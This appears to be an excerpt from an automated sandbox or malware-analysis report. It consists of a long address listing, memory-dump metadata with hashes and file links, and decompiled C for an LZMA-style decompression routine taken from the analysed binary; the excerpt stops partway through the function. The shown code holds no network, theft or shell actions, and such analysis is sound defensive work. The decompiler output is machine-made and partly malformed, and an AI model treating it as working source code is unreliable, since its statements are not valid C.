                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e6
                                                              0x004069e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004069ef
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a26
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a59
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a62
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a77
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aea
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
                                                              0x00406ad5
                                                              0x00406aef
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00000000
                                                              0x00406afb
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406af9
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b3b
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00406b60
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00000000
                                                              0x00406b07
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b83
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bae
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bb3
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f81
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00000000
                                                              0x0040704f
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x0040710c
                                                              0x0040700d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5a
                                                              0x00406d5d
                                                              0x00406d60
                                                              0x00406d62
                                                              0x00406d64
                                                              0x00406d64
                                                              0x00406d65
                                                              0x00406d68
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00000000
                                                              0x00407065
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x00000000
                                                              0x004071a1
                                                              0x0040706f
                                                              0x00407072
                                                              0x00407075
                                                              0x00407079
                                                              0x0040707c
                                                              0x00407082
                                                              0x00407084
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708d
                                                              0x0040708d
                                                              0x00407091
                                                              0x004070f1
                                                              0x004070f4
                                                              0x004070f9
                                                              0x004070fa
                                                              0x004070fc
                                                              0x004070fe
                                                              0x00407101
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00407013
                                                              0x0040700d
                                                              0x00407093
                                                              0x00407099
                                                              0x0040709c
                                                              0x0040709f
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b1
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070d3
                                                              0x004070d6
                                                              0x004070da
                                                              0x004070dc
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070be
                                                              0x004070c3
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070e3
                                                              0x004070ea
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b0a
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c95
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x00000000
                                                              0x0040715f
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca5
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00000000
                                                              0x00406cd3
                                                              0x00406f54
                                                              0x00407189
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x004071c0
                                                              0x004071c0
                                                              0x00000000
                                                              0x004071c0
                                                              0x0040700d
                                                              0x00406f94
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406ce6

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                              • Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
                                                              • Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                              • Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406C2E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
